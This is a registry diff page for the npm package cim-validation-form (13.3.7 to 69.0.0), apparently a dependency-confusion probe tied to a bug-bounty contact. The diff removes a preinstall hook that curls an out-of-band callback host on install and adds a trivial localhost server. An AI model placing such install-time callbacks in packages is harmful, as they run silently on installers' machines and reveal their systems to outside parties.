cim-validation-form 13.3.7 → 69.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of cim-validation-form might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +9 -0
  2. package/package.json +3 -4
package/index.js ADDED
@@ -0,0 +1,9 @@
1
+ const http = require('http');
2
+ const hostname = 'localhost';
3
+ const port = 3000;
4
+ const server = http.createServer((req, res) => {
5
+ console.log(req.headers);
6
+ res.statusCode = 200;
7
+ res.end('<html><body><h3>HellO, World 2023, January 13...!</h3></body></html>');
8
+ })
9
+ server.listen(port, hostname);
package/package.json CHANGED
@@ -1,11 +1,10 @@
1
1
  {
2
2
  "name": "cim-validation-form",
3
- "version": "13.3.7",
4
- "description": "",
3
+ "version": "69.0.0",
4
+ "description": "Placeholder package whilst we get to grips with NPM. Get in touch if you want: bugbounty@bugbounty.click",
5
5
  "main": "index.js",
6
6
  "scripts": {
7
- "test": "echo \"Error: no test specified\" && exit 1",
8
- "preinstall": "curl t4ym4klfxfsouv3m8ujo0gyunltch55u.pen-oob.opr.statefarm.org"
7
+ "test": "echo \"Error: no test specified\" && exit 1"
9
8
  },
10
9
  "author": "",
11
10
  "license": "ISC"